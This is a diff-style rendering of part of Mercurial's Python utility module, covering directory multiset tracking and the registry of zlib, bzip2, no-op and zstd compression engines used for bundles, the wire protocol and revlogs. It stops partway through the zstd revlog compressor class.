3211 for line in getstackframes(skip + 1, depth=depth):
3220 for line in getstackframes(skip + 1, depth=depth):
3212 f.write(line)
3221 f.write(line)
3213 f.flush()
3222 f.flush()
3214
3223
3215 class dirs(object):
3224 class dirs(object):
3216 '''a multiset of directory names from a dirstate or manifest'''
3225 '''a multiset of directory names from a dirstate or manifest'''
3217
3226
3218 def __init__(self, map, skip=None):
3227 def __init__(self, map, skip=None):
3219 self._dirs = {}
3228 self._dirs = {}
3220 addpath = self.addpath
3229 addpath = self.addpath
3221 if safehasattr(map, 'iteritems') and skip is not None:
3230 if safehasattr(map, 'iteritems') and skip is not None:
3222 for f, s in map.iteritems():
3231 for f, s in map.iteritems():
3223 if s[0] != skip:
3232 if s[0] != skip:
3224 addpath(f)
3233 addpath(f)
3225 else:
3234 else:
3226 for f in map:
3235 for f in map:
3227 addpath(f)
3236 addpath(f)
3228
3237
3229 def addpath(self, path):
3238 def addpath(self, path):
3230 dirs = self._dirs
3239 dirs = self._dirs
3231 for base in finddirs(path):
3240 for base in finddirs(path):
3232 if base in dirs:
3241 if base in dirs:
3233 dirs[base] += 1
3242 dirs[base] += 1
3234 return
3243 return
3235 dirs[base] = 1
3244 dirs[base] = 1
3236
3245
3237 def delpath(self, path):
3246 def delpath(self, path):
3238 dirs = self._dirs
3247 dirs = self._dirs
3239 for base in finddirs(path):
3248 for base in finddirs(path):
3240 if dirs[base] > 1:
3249 if dirs[base] > 1:
3241 dirs[base] -= 1
3250 dirs[base] -= 1
3242 return
3251 return
3243 del dirs[base]
3252 del dirs[base]
3244
3253
3245 def __iter__(self):
3254 def __iter__(self):
3246 return iter(self._dirs)
3255 return iter(self._dirs)
3247
3256
3248 def __contains__(self, d):
3257 def __contains__(self, d):
3249 return d in self._dirs
3258 return d in self._dirs
3250
3259
3251 if safehasattr(parsers, 'dirs'):
3260 if safehasattr(parsers, 'dirs'):
3252 dirs = parsers.dirs
3261 dirs = parsers.dirs
3253
3262
3254 def finddirs(path):
3263 def finddirs(path):
3255 pos = path.rfind('/')
3264 pos = path.rfind('/')
3256 while pos != -1:
3265 while pos != -1:
3257 yield path[:pos]
3266 yield path[:pos]
3258 pos = path.rfind('/', 0, pos)
3267 pos = path.rfind('/', 0, pos)
3259
3268
3260 # compression code
3269 # compression code
3261
3270
3262 SERVERROLE = 'server'
3271 SERVERROLE = 'server'
3263 CLIENTROLE = 'client'
3272 CLIENTROLE = 'client'
3264
3273
3265 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3274 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3266 (u'name', u'serverpriority',
3275 (u'name', u'serverpriority',
3267 u'clientpriority'))
3276 u'clientpriority'))
3268
3277
3269 class compressormanager(object):
3278 class compressormanager(object):
3270 """Holds registrations of various compression engines.
3279 """Holds registrations of various compression engines.
3271
3280
3272 This class essentially abstracts the differences between compression
3281 This class essentially abstracts the differences between compression
3273 engines to allow new compression formats to be added easily, possibly from
3282 engines to allow new compression formats to be added easily, possibly from
3274 extensions.
3283 extensions.
3275
3284
3276 Compressors are registered against the global instance by calling its
3285 Compressors are registered against the global instance by calling its
3277 ``register()`` method.
3286 ``register()`` method.
3278 """
3287 """
3279 def __init__(self):
3288 def __init__(self):
3280 self._engines = {}
3289 self._engines = {}
3281 # Bundle spec human name to engine name.
3290 # Bundle spec human name to engine name.
3282 self._bundlenames = {}
3291 self._bundlenames = {}
3283 # Internal bundle identifier to engine name.
3292 # Internal bundle identifier to engine name.
3284 self._bundletypes = {}
3293 self._bundletypes = {}
3285 # Revlog header to engine name.
3294 # Revlog header to engine name.
3286 self._revlogheaders = {}
3295 self._revlogheaders = {}
3287 # Wire proto identifier to engine name.
3296 # Wire proto identifier to engine name.
3288 self._wiretypes = {}
3297 self._wiretypes = {}
3289
3298
3290 def __getitem__(self, key):
3299 def __getitem__(self, key):
3291 return self._engines[key]
3300 return self._engines[key]
3292
3301
3293 def __contains__(self, key):
3302 def __contains__(self, key):
3294 return key in self._engines
3303 return key in self._engines
3295
3304
3296 def __iter__(self):
3305 def __iter__(self):
3297 return iter(self._engines.keys())
3306 return iter(self._engines.keys())
3298
3307
3299 def register(self, engine):
3308 def register(self, engine):
3300 """Register a compression engine with the manager.
3309 """Register a compression engine with the manager.
3301
3310
3302 The argument must be a ``compressionengine`` instance.
3311 The argument must be a ``compressionengine`` instance.
3303 """
3312 """
3304 if not isinstance(engine, compressionengine):
3313 if not isinstance(engine, compressionengine):
3305 raise ValueError(_('argument must be a compressionengine'))
3314 raise ValueError(_('argument must be a compressionengine'))
3306
3315
3307 name = engine.name()
3316 name = engine.name()
3308
3317
3309 if name in self._engines:
3318 if name in self._engines:
3310 raise error.Abort(_('compression engine %s already registered') %
3319 raise error.Abort(_('compression engine %s already registered') %
3311 name)
3320 name)
3312
3321
3313 bundleinfo = engine.bundletype()
3322 bundleinfo = engine.bundletype()
3314 if bundleinfo:
3323 if bundleinfo:
3315 bundlename, bundletype = bundleinfo
3324 bundlename, bundletype = bundleinfo
3316
3325
3317 if bundlename in self._bundlenames:
3326 if bundlename in self._bundlenames:
3318 raise error.Abort(_('bundle name %s already registered') %
3327 raise error.Abort(_('bundle name %s already registered') %
3319 bundlename)
3328 bundlename)
3320 if bundletype in self._bundletypes:
3329 if bundletype in self._bundletypes:
3321 raise error.Abort(_('bundle type %s already registered by %s') %
3330 raise error.Abort(_('bundle type %s already registered by %s') %
3322 (bundletype, self._bundletypes[bundletype]))
3331 (bundletype, self._bundletypes[bundletype]))
3323
3332
3324 # No external facing name declared.
3333 # No external facing name declared.
3325 if bundlename:
3334 if bundlename:
3326 self._bundlenames[bundlename] = name
3335 self._bundlenames[bundlename] = name
3327
3336
3328 self._bundletypes[bundletype] = name
3337 self._bundletypes[bundletype] = name
3329
3338
3330 wiresupport = engine.wireprotosupport()
3339 wiresupport = engine.wireprotosupport()
3331 if wiresupport:
3340 if wiresupport:
3332 wiretype = wiresupport.name
3341 wiretype = wiresupport.name
3333 if wiretype in self._wiretypes:
3342 if wiretype in self._wiretypes:
3334 raise error.Abort(_('wire protocol compression %s already '
3343 raise error.Abort(_('wire protocol compression %s already '
3335 'registered by %s') %
3344 'registered by %s') %
3336 (wiretype, self._wiretypes[wiretype]))
3345 (wiretype, self._wiretypes[wiretype]))
3337
3346
3338 self._wiretypes[wiretype] = name
3347 self._wiretypes[wiretype] = name
3339
3348
3340 revlogheader = engine.revlogheader()
3349 revlogheader = engine.revlogheader()
3341 if revlogheader and revlogheader in self._revlogheaders:
3350 if revlogheader and revlogheader in self._revlogheaders:
3342 raise error.Abort(_('revlog header %s already registered by %s') %
3351 raise error.Abort(_('revlog header %s already registered by %s') %
3343 (revlogheader, self._revlogheaders[revlogheader]))
3352 (revlogheader, self._revlogheaders[revlogheader]))
3344
3353
3345 if revlogheader:
3354 if revlogheader:
3346 self._revlogheaders[revlogheader] = name
3355 self._revlogheaders[revlogheader] = name
3347
3356
3348 self._engines[name] = engine
3357 self._engines[name] = engine
3349
3358
3350 @property
3359 @property
3351 def supportedbundlenames(self):
3360 def supportedbundlenames(self):
3352 return set(self._bundlenames.keys())
3361 return set(self._bundlenames.keys())
3353
3362
3354 @property
3363 @property
3355 def supportedbundletypes(self):
3364 def supportedbundletypes(self):
3356 return set(self._bundletypes.keys())
3365 return set(self._bundletypes.keys())
3357
3366
3358 def forbundlename(self, bundlename):
3367 def forbundlename(self, bundlename):
3359 """Obtain a compression engine registered to a bundle name.
3368 """Obtain a compression engine registered to a bundle name.
3360
3369
3361 Will raise KeyError if the bundle type isn't registered.
3370 Will raise KeyError if the bundle type isn't registered.
3362
3371
3363 Will abort if the engine is known but not available.
3372 Will abort if the engine is known but not available.
3364 """
3373 """
3365 engine = self._engines[self._bundlenames[bundlename]]
3374 engine = self._engines[self._bundlenames[bundlename]]
3366 if not engine.available():
3375 if not engine.available():
3367 raise error.Abort(_('compression engine %s could not be loaded') %
3376 raise error.Abort(_('compression engine %s could not be loaded') %
3368 engine.name())
3377 engine.name())
3369 return engine
3378 return engine
3370
3379
3371 def forbundletype(self, bundletype):
3380 def forbundletype(self, bundletype):
3372 """Obtain a compression engine registered to a bundle type.
3381 """Obtain a compression engine registered to a bundle type.
3373
3382
3374 Will raise KeyError if the bundle type isn't registered.
3383 Will raise KeyError if the bundle type isn't registered.
3375
3384
3376 Will abort if the engine is known but not available.
3385 Will abort if the engine is known but not available.
3377 """
3386 """
3378 engine = self._engines[self._bundletypes[bundletype]]
3387 engine = self._engines[self._bundletypes[bundletype]]
3379 if not engine.available():
3388 if not engine.available():
3380 raise error.Abort(_('compression engine %s could not be loaded') %
3389 raise error.Abort(_('compression engine %s could not be loaded') %
3381 engine.name())
3390 engine.name())
3382 return engine
3391 return engine
3383
3392
3384 def supportedwireengines(self, role, onlyavailable=True):
3393 def supportedwireengines(self, role, onlyavailable=True):
3385 """Obtain compression engines that support the wire protocol.
3394 """Obtain compression engines that support the wire protocol.
3386
3395
3387 Returns a list of engines in prioritized order, most desired first.
3396 Returns a list of engines in prioritized order, most desired first.
3388
3397
3389 If ``onlyavailable`` is set, filter out engines that can't be
3398 If ``onlyavailable`` is set, filter out engines that can't be
3390 loaded.
3399 loaded.
3391 """
3400 """
3392 assert role in (SERVERROLE, CLIENTROLE)
3401 assert role in (SERVERROLE, CLIENTROLE)
3393
3402
3394 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3403 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3395
3404
3396 engines = [self._engines[e] for e in self._wiretypes.values()]
3405 engines = [self._engines[e] for e in self._wiretypes.values()]
3397 if onlyavailable:
3406 if onlyavailable:
3398 engines = [e for e in engines if e.available()]
3407 engines = [e for e in engines if e.available()]
3399
3408
3400 def getkey(e):
3409 def getkey(e):
3401 # Sort first by priority, highest first. In case of tie, sort
3410 # Sort first by priority, highest first. In case of tie, sort
3402 # alphabetically. This is arbitrary, but ensures output is
3411 # alphabetically. This is arbitrary, but ensures output is
3403 # stable.
3412 # stable.
3404 w = e.wireprotosupport()
3413 w = e.wireprotosupport()
3405 return -1 * getattr(w, attr), w.name
3414 return -1 * getattr(w, attr), w.name
3406
3415
3407 return list(sorted(engines, key=getkey))
3416 return list(sorted(engines, key=getkey))
3408
3417
3409 def forwiretype(self, wiretype):
3418 def forwiretype(self, wiretype):
3410 engine = self._engines[self._wiretypes[wiretype]]
3419 engine = self._engines[self._wiretypes[wiretype]]
3411 if not engine.available():
3420 if not engine.available():
3412 raise error.Abort(_('compression engine %s could not be loaded') %
3421 raise error.Abort(_('compression engine %s could not be loaded') %
3413 engine.name())
3422 engine.name())
3414 return engine
3423 return engine
3415
3424
3416 def forrevlogheader(self, header):
3425 def forrevlogheader(self, header):
3417 """Obtain a compression engine registered to a revlog header.
3426 """Obtain a compression engine registered to a revlog header.
3418
3427
3419 Will raise KeyError if the revlog header value isn't registered.
3428 Will raise KeyError if the revlog header value isn't registered.
3420 """
3429 """
3421 return self._engines[self._revlogheaders[header]]
3430 return self._engines[self._revlogheaders[header]]
3422
3431
3423 compengines = compressormanager()
3432 compengines = compressormanager()
3424
3433
3425 class compressionengine(object):
3434 class compressionengine(object):
3426 """Base class for compression engines.
3435 """Base class for compression engines.
3427
3436
3428 Compression engines must implement the interface defined by this class.
3437 Compression engines must implement the interface defined by this class.
3429 """
3438 """
3430 def name(self):
3439 def name(self):
3431 """Returns the name of the compression engine.
3440 """Returns the name of the compression engine.
3432
3441
3433 This is the key the engine is registered under.
3442 This is the key the engine is registered under.
3434
3443
3435 This method must be implemented.
3444 This method must be implemented.
3436 """
3445 """
3437 raise NotImplementedError()
3446 raise NotImplementedError()
3438
3447
3439 def available(self):
3448 def available(self):
3440 """Whether the compression engine is available.
3449 """Whether the compression engine is available.
3441
3450
3442 The intent of this method is to allow optional compression engines
3451 The intent of this method is to allow optional compression engines
3443 that may not be available in all installations (such as engines relying
3452 that may not be available in all installations (such as engines relying
3444 on C extensions that may not be present).
3453 on C extensions that may not be present).
3445 """
3454 """
3446 return True
3455 return True
3447
3456
3448 def bundletype(self):
3457 def bundletype(self):
3449 """Describes bundle identifiers for this engine.
3458 """Describes bundle identifiers for this engine.
3450
3459
3451 If this compression engine isn't supported for bundles, returns None.
3460 If this compression engine isn't supported for bundles, returns None.
3452
3461
3453 If this engine can be used for bundles, returns a 2-tuple of strings of
3462 If this engine can be used for bundles, returns a 2-tuple of strings of
3454 the user-facing "bundle spec" compression name and an internal
3463 the user-facing "bundle spec" compression name and an internal
3455 identifier used to denote the compression format within bundles. To
3464 identifier used to denote the compression format within bundles. To
3456 exclude the name from external usage, set the first element to ``None``.
3465 exclude the name from external usage, set the first element to ``None``.
3457
3466
3458 If bundle compression is supported, the class must also implement
3467 If bundle compression is supported, the class must also implement
3459 ``compressstream`` and `decompressorreader``.
3468 ``compressstream`` and `decompressorreader``.
3460
3469
3461 The docstring of this method is used in the help system to tell users
3470 The docstring of this method is used in the help system to tell users
3462 about this engine.
3471 about this engine.
3463 """
3472 """
3464 return None
3473 return None
3465
3474
3466 def wireprotosupport(self):
3475 def wireprotosupport(self):
3467 """Declare support for this compression format on the wire protocol.
3476 """Declare support for this compression format on the wire protocol.
3468
3477
3469 If this compression engine isn't supported for compressing wire
3478 If this compression engine isn't supported for compressing wire
3470 protocol payloads, returns None.
3479 protocol payloads, returns None.
3471
3480
3472 Otherwise, returns ``compenginewireprotosupport`` with the following
3481 Otherwise, returns ``compenginewireprotosupport`` with the following
3473 fields:
3482 fields:
3474
3483
3475 * String format identifier
3484 * String format identifier
3476 * Integer priority for the server
3485 * Integer priority for the server
3477 * Integer priority for the client
3486 * Integer priority for the client
3478
3487
3479 The integer priorities are used to order the advertisement of format
3488 The integer priorities are used to order the advertisement of format
3480 support by server and client. The highest integer is advertised
3489 support by server and client. The highest integer is advertised
3481 first. Integers with non-positive values aren't advertised.
3490 first. Integers with non-positive values aren't advertised.
3482
3491
3483 The priority values are somewhat arbitrary and only used for default
3492 The priority values are somewhat arbitrary and only used for default
3484 ordering. The relative order can be changed via config options.
3493 ordering. The relative order can be changed via config options.
3485
3494
3486 If wire protocol compression is supported, the class must also implement
3495 If wire protocol compression is supported, the class must also implement
3487 ``compressstream`` and ``decompressorreader``.
3496 ``compressstream`` and ``decompressorreader``.
3488 """
3497 """
3489 return None
3498 return None
3490
3499
3491 def revlogheader(self):
3500 def revlogheader(self):
3492 """Header added to revlog chunks that identifies this engine.
3501 """Header added to revlog chunks that identifies this engine.
3493
3502
3494 If this engine can be used to compress revlogs, this method should
3503 If this engine can be used to compress revlogs, this method should
3495 return the bytes used to identify chunks compressed with this engine.
3504 return the bytes used to identify chunks compressed with this engine.
3496 Else, the method should return ``None`` to indicate it does not
3505 Else, the method should return ``None`` to indicate it does not
3497 participate in revlog compression.
3506 participate in revlog compression.
3498 """
3507 """
3499 return None
3508 return None
3500
3509
3501 def compressstream(self, it, opts=None):
3510 def compressstream(self, it, opts=None):
3502 """Compress an iterator of chunks.
3511 """Compress an iterator of chunks.
3503
3512
3504 The method receives an iterator (ideally a generator) of chunks of
3513 The method receives an iterator (ideally a generator) of chunks of
3505 bytes to be compressed. It returns an iterator (ideally a generator)
3514 bytes to be compressed. It returns an iterator (ideally a generator)
3506 of bytes of chunks representing the compressed output.
3515 of bytes of chunks representing the compressed output.
3507
3516
3508 Optionally accepts an argument defining how to perform compression.
3517 Optionally accepts an argument defining how to perform compression.
3509 Each engine treats this argument differently.
3518 Each engine treats this argument differently.
3510 """
3519 """
3511 raise NotImplementedError()
3520 raise NotImplementedError()
3512
3521
3513 def decompressorreader(self, fh):
3522 def decompressorreader(self, fh):
3514 """Perform decompression on a file object.
3523 """Perform decompression on a file object.
3515
3524
3516 Argument is an object with a ``read(size)`` method that returns
3525 Argument is an object with a ``read(size)`` method that returns
3517 compressed data. Return value is an object with a ``read(size)`` that
3526 compressed data. Return value is an object with a ``read(size)`` that
3518 returns uncompressed data.
3527 returns uncompressed data.
3519 """
3528 """
3520 raise NotImplementedError()
3529 raise NotImplementedError()
3521
3530
3522 def revlogcompressor(self, opts=None):
3531 def revlogcompressor(self, opts=None):
3523 """Obtain an object that can be used to compress revlog entries.
3532 """Obtain an object that can be used to compress revlog entries.
3524
3533
3525 The object has a ``compress(data)`` method that compresses binary
3534 The object has a ``compress(data)`` method that compresses binary
3526 data. This method returns compressed binary data or ``None`` if
3535 data. This method returns compressed binary data or ``None`` if
3527 the data could not be compressed (too small, not compressible, etc).
3536 the data could not be compressed (too small, not compressible, etc).
3528 The returned data should have a header uniquely identifying this
3537 The returned data should have a header uniquely identifying this
3529 compression format so decompression can be routed to this engine.
3538 compression format so decompression can be routed to this engine.
3530 This header should be identified by the ``revlogheader()`` return
3539 This header should be identified by the ``revlogheader()`` return
3531 value.
3540 value.
3532
3541
3533 The object has a ``decompress(data)`` method that decompresses
3542 The object has a ``decompress(data)`` method that decompresses
3534 data. The method will only be called if ``data`` begins with
3543 data. The method will only be called if ``data`` begins with
3535 ``revlogheader()``. The method should return the raw, uncompressed
3544 ``revlogheader()``. The method should return the raw, uncompressed
3536 data or raise a ``RevlogError``.
3545 data or raise a ``RevlogError``.
3537
3546
3538 The object is reusable but is not thread safe.
3547 The object is reusable but is not thread safe.
3539 """
3548 """
3540 raise NotImplementedError()
3549 raise NotImplementedError()
3541
3550
3542 class _zlibengine(compressionengine):
3551 class _zlibengine(compressionengine):
3543 def name(self):
3552 def name(self):
3544 return 'zlib'
3553 return 'zlib'
3545
3554
3546 def bundletype(self):
3555 def bundletype(self):
3547 """zlib compression using the DEFLATE algorithm.
3556 """zlib compression using the DEFLATE algorithm.
3548
3557
3549 All Mercurial clients should support this format. The compression
3558 All Mercurial clients should support this format. The compression
3550 algorithm strikes a reasonable balance between compression ratio
3559 algorithm strikes a reasonable balance between compression ratio
3551 and size.
3560 and size.
3552 """
3561 """
3553 return 'gzip', 'GZ'
3562 return 'gzip', 'GZ'
3554
3563
3555 def wireprotosupport(self):
3564 def wireprotosupport(self):
3556 return compewireprotosupport('zlib', 20, 20)
3565 return compewireprotosupport('zlib', 20, 20)
3557
3566
3558 def revlogheader(self):
3567 def revlogheader(self):
3559 return 'x'
3568 return 'x'
3560
3569
3561 def compressstream(self, it, opts=None):
3570 def compressstream(self, it, opts=None):
3562 opts = opts or {}
3571 opts = opts or {}
3563
3572
3564 z = zlib.compressobj(opts.get('level', -1))
3573 z = zlib.compressobj(opts.get('level', -1))
3565 for chunk in it:
3574 for chunk in it:
3566 data = z.compress(chunk)
3575 data = z.compress(chunk)
3567 # Not all calls to compress emit data. It is cheaper to inspect
3576 # Not all calls to compress emit data. It is cheaper to inspect
3568 # here than to feed empty chunks through generator.
3577 # here than to feed empty chunks through generator.
3569 if data:
3578 if data:
3570 yield data
3579 yield data
3571
3580
3572 yield z.flush()
3581 yield z.flush()
3573
3582
3574 def decompressorreader(self, fh):
3583 def decompressorreader(self, fh):
3575 def gen():
3584 def gen():
3576 d = zlib.decompressobj()
3585 d = zlib.decompressobj()
3577 for chunk in filechunkiter(fh):
3586 for chunk in filechunkiter(fh):
3578 while chunk:
3587 while chunk:
3579 # Limit output size to limit memory.
3588 # Limit output size to limit memory.
3580 yield d.decompress(chunk, 2 ** 18)
3589 yield d.decompress(chunk, 2 ** 18)
3581 chunk = d.unconsumed_tail
3590 chunk = d.unconsumed_tail
3582
3591
3583 return chunkbuffer(gen())
3592 return chunkbuffer(gen())
3584
3593
3585 class zlibrevlogcompressor(object):
3594 class zlibrevlogcompressor(object):
3586 def compress(self, data):
3595 def compress(self, data):
3587 insize = len(data)
3596 insize = len(data)
3588 # Caller handles empty input case.
3597 # Caller handles empty input case.
3589 assert insize > 0
3598 assert insize > 0
3590
3599
3591 if insize < 44:
3600 if insize < 44:
3592 return None
3601 return None
3593
3602
3594 elif insize <= 1000000:
3603 elif insize <= 1000000:
3595 compressed = zlib.compress(data)
3604 compressed = zlib.compress(data)
3596 if len(compressed) < insize:
3605 if len(compressed) < insize:
3597 return compressed
3606 return compressed
3598 return None
3607 return None
3599
3608
3600 # zlib makes an internal copy of the input buffer, doubling
3609 # zlib makes an internal copy of the input buffer, doubling
3601 # memory usage for large inputs. So do streaming compression
3610 # memory usage for large inputs. So do streaming compression
3602 # on large inputs.
3611 # on large inputs.
3603 else:
3612 else:
3604 z = zlib.compressobj()
3613 z = zlib.compressobj()
3605 parts = []
3614 parts = []
3606 pos = 0
3615 pos = 0
3607 while pos < insize:
3616 while pos < insize:
3608 pos2 = pos + 2**20
3617 pos2 = pos + 2**20
3609 parts.append(z.compress(data[pos:pos2]))
3618 parts.append(z.compress(data[pos:pos2]))
3610 pos = pos2
3619 pos = pos2
3611 parts.append(z.flush())
3620 parts.append(z.flush())
3612
3621
3613 if sum(map(len, parts)) < insize:
3622 if sum(map(len, parts)) < insize:
3614 return ''.join(parts)
3623 return ''.join(parts)
3615 return None
3624 return None
3616
3625
3617 def decompress(self, data):
3626 def decompress(self, data):
3618 try:
3627 try:
3619 return zlib.decompress(data)
3628 return zlib.decompress(data)
3620 except zlib.error as e:
3629 except zlib.error as e:
3621 raise error.RevlogError(_('revlog decompress error: %s') %
3630 raise error.RevlogError(_('revlog decompress error: %s') %
3622 forcebytestr(e))
3631 forcebytestr(e))
3623
3632
3624 def revlogcompressor(self, opts=None):
3633 def revlogcompressor(self, opts=None):
3625 return self.zlibrevlogcompressor()
3634 return self.zlibrevlogcompressor()
3626
3635
3627 compengines.register(_zlibengine())
3636 compengines.register(_zlibengine())
3628
3637
3629 class _bz2engine(compressionengine):
3638 class _bz2engine(compressionengine):
3630 def name(self):
3639 def name(self):
3631 return 'bz2'
3640 return 'bz2'
3632
3641
3633 def bundletype(self):
3642 def bundletype(self):
3634 """An algorithm that produces smaller bundles than ``gzip``.
3643 """An algorithm that produces smaller bundles than ``gzip``.
3635
3644
3636 All Mercurial clients should support this format.
3645 All Mercurial clients should support this format.
3637
3646
3638 This engine will likely produce smaller bundles than ``gzip`` but
3647 This engine will likely produce smaller bundles than ``gzip`` but
3639 will be significantly slower, both during compression and
3648 will be significantly slower, both during compression and
3640 decompression.
3649 decompression.
3641
3650
3642 If available, the ``zstd`` engine can yield similar or better
3651 If available, the ``zstd`` engine can yield similar or better
3643 compression at much higher speeds.
3652 compression at much higher speeds.
3644 """
3653 """
3645 return 'bzip2', 'BZ'
3654 return 'bzip2', 'BZ'
3646
3655
3647 # We declare a protocol name but don't advertise by default because
3656 # We declare a protocol name but don't advertise by default because
3648 # it is slow.
3657 # it is slow.
3649 def wireprotosupport(self):
3658 def wireprotosupport(self):
3650 return compewireprotosupport('bzip2', 0, 0)
3659 return compewireprotosupport('bzip2', 0, 0)
3651
3660
3652 def compressstream(self, it, opts=None):
3661 def compressstream(self, it, opts=None):
3653 opts = opts or {}
3662 opts = opts or {}
3654 z = bz2.BZ2Compressor(opts.get('level', 9))
3663 z = bz2.BZ2Compressor(opts.get('level', 9))
3655 for chunk in it:
3664 for chunk in it:
3656 data = z.compress(chunk)
3665 data = z.compress(chunk)
3657 if data:
3666 if data:
3658 yield data
3667 yield data
3659
3668
3660 yield z.flush()
3669 yield z.flush()
3661
3670
3662 def decompressorreader(self, fh):
3671 def decompressorreader(self, fh):
3663 def gen():
3672 def gen():
3664 d = bz2.BZ2Decompressor()
3673 d = bz2.BZ2Decompressor()
3665 for chunk in filechunkiter(fh):
3674 for chunk in filechunkiter(fh):
3666 yield d.decompress(chunk)
3675 yield d.decompress(chunk)
3667
3676
3668 return chunkbuffer(gen())
3677 return chunkbuffer(gen())
3669
3678
3670 compengines.register(_bz2engine())
3679 compengines.register(_bz2engine())
3671
3680
3672 class _truncatedbz2engine(compressionengine):
3681 class _truncatedbz2engine(compressionengine):
3673 def name(self):
3682 def name(self):
3674 return 'bz2truncated'
3683 return 'bz2truncated'
3675
3684
3676 def bundletype(self):
3685 def bundletype(self):
3677 return None, '_truncatedBZ'
3686 return None, '_truncatedBZ'
3678
3687
3679 # We don't implement compressstream because it is hackily handled elsewhere.
3688 # We don't implement compressstream because it is hackily handled elsewhere.
3680
3689
3681 def decompressorreader(self, fh):
3690 def decompressorreader(self, fh):
3682 def gen():
3691 def gen():
3683 # The input stream doesn't have the 'BZ' header. So add it back.
3692 # The input stream doesn't have the 'BZ' header. So add it back.
3684 d = bz2.BZ2Decompressor()
3693 d = bz2.BZ2Decompressor()
3685 d.decompress('BZ')
3694 d.decompress('BZ')
3686 for chunk in filechunkiter(fh):
3695 for chunk in filechunkiter(fh):
3687 yield d.decompress(chunk)
3696 yield d.decompress(chunk)
3688
3697
3689 return chunkbuffer(gen())
3698 return chunkbuffer(gen())
3690
3699
3691 compengines.register(_truncatedbz2engine())
3700 compengines.register(_truncatedbz2engine())
3692
3701
3693 class _noopengine(compressionengine):
3702 class _noopengine(compressionengine):
3694 def name(self):
3703 def name(self):
3695 return 'none'
3704 return 'none'
3696
3705
3697 def bundletype(self):
3706 def bundletype(self):
3698 """No compression is performed.
3707 """No compression is performed.
3699
3708
3700 Use this compression engine to explicitly disable compression.
3709 Use this compression engine to explicitly disable compression.
3701 """
3710 """
3702 return 'none', 'UN'
3711 return 'none', 'UN'
3703
3712
3704 # Clients always support uncompressed payloads. Servers don't because
3713 # Clients always support uncompressed payloads. Servers don't because
3705 # unless you are on a fast network, uncompressed payloads can easily
3714 # unless you are on a fast network, uncompressed payloads can easily
3706 # saturate your network pipe.
3715 # saturate your network pipe.
3707 def wireprotosupport(self):
3716 def wireprotosupport(self):
3708 return compewireprotosupport('none', 0, 10)
3717 return compewireprotosupport('none', 0, 10)
3709
3718
3710 # We don't implement revlogheader because it is handled specially
3719 # We don't implement revlogheader because it is handled specially
3711 # in the revlog class.
3720 # in the revlog class.
3712
3721
3713 def compressstream(self, it, opts=None):
3722 def compressstream(self, it, opts=None):
3714 return it
3723 return it
3715
3724
3716 def decompressorreader(self, fh):
3725 def decompressorreader(self, fh):
3717 return fh
3726 return fh
3718
3727
3719 class nooprevlogcompressor(object):
3728 class nooprevlogcompressor(object):
3720 def compress(self, data):
3729 def compress(self, data):
3721 return None
3730 return None
3722
3731
3723 def revlogcompressor(self, opts=None):
3732 def revlogcompressor(self, opts=None):
3724 return self.nooprevlogcompressor()
3733 return self.nooprevlogcompressor()
3725
3734
3726 compengines.register(_noopengine())
3735 compengines.register(_noopengine())
3727
3736
3728 class _zstdengine(compressionengine):
3737 class _zstdengine(compressionengine):
3729 def name(self):
3738 def name(self):
3730 return 'zstd'
3739 return 'zstd'
3731
3740
3732 @propertycache
3741 @propertycache
3733 def _module(self):
3742 def _module(self):
3734 # Not all installs have the zstd module available. So defer importing
3743 # Not all installs have the zstd module available. So defer importing
3735 # until first access.
3744 # until first access.
3736 try:
3745 try:
3737 from . import zstd
3746 from . import zstd
3738 # Force delayed import.
3747 # Force delayed import.
3739 zstd.__version__
3748 zstd.__version__
3740 return zstd
3749 return zstd
3741 except ImportError:
3750 except ImportError:
3742 return None
3751 return None
3743
3752
3744 def available(self):
3753 def available(self):
3745 return bool(self._module)
3754 return bool(self._module)
3746
3755
3747 def bundletype(self):
3756 def bundletype(self):
3748 """A modern compression algorithm that is fast and highly flexible.
3757 """A modern compression algorithm that is fast and highly flexible.
3749
3758
3750 Only supported by Mercurial 4.1 and newer clients.
3759 Only supported by Mercurial 4.1 and newer clients.
3751
3760
3752 With the default settings, zstd compression is both faster and yields
3761 With the default settings, zstd compression is both faster and yields
3753 better compression than ``gzip``. It also frequently yields better
3762 better compression than ``gzip``. It also frequently yields better
3754 compression than ``bzip2`` while operating at much higher speeds.
3763 compression than ``bzip2`` while operating at much higher speeds.
3755
3764
3756 If this engine is available and backwards compatibility is not a
3765 If this engine is available and backwards compatibility is not a
3757 concern, it is likely the best available engine.
3766 concern, it is likely the best available engine.
3758 """
3767 """
3759 return 'zstd', 'ZS'
3768 return 'zstd', 'ZS'
3760
3769
3761 def wireprotosupport(self):
3770 def wireprotosupport(self):
3762 return compewireprotosupport('zstd', 50, 50)
3771 return compewireprotosupport('zstd', 50, 50)
3763
3772
3764 def revlogheader(self):
3773 def revlogheader(self):
3765 return '\x28'
3774 return '\x28'
3766
3775
3767 def compressstream(self, it, opts=None):
3776 def compressstream(self, it, opts=None):
3768 opts = opts or {}
3777 opts = opts or {}
3769 # zstd level 3 is almost always significantly faster than zlib
3778 # zstd level 3 is almost always significantly faster than zlib
3770 # while providing no worse compression. It strikes a good balance
3779 # while providing no worse compression. It strikes a good balance
3771 # between speed and compression.
3780 # between speed and compression.
3772 level = opts.get('level', 3)
3781 level = opts.get('level', 3)
3773
3782
3774 zstd = self._module
3783 zstd = self._module
3775 z = zstd.ZstdCompressor(level=level).compressobj()
3784 z = zstd.ZstdCompressor(level=level).compressobj()
3776 for chunk in it:
3785 for chunk in it:
3777 data = z.compress(chunk)
3786 data = z.compress(chunk)
3778 if data:
3787 if data:
3779 yield data
3788 yield data
3780
3789
3781 yield z.flush()
3790 yield z.flush()
3782
3791
3783 def decompressorreader(self, fh):
3792 def decompressorreader(self, fh):
3784 zstd = self._module
3793 zstd = self._module
3785 dctx = zstd.ZstdDecompressor()
3794 dctx = zstd.ZstdDecompressor()
3786 return chunkbuffer(dctx.read_from(fh))
3795 return chunkbuffer(dctx.read_from(fh))
3787
3796
3788 class zstdrevlogcompressor(object):
3797 class zstdrevlogcompressor(object):
3789 def __init__(self, zstd, level=3):
3798 def __init__(self, zstd, level=3):
3790 # Writing the content size adds a few bytes to the output. However,
3799 # Writing the content size adds a few bytes to the output. However,
3791 # it allows decompression to be more optimal since we can
3800 # it allows decompression to be more optimal since we can
3792 # pre-allocate a buffer to hold the result.
3801 # pre-allocate a buffer to hold the result.
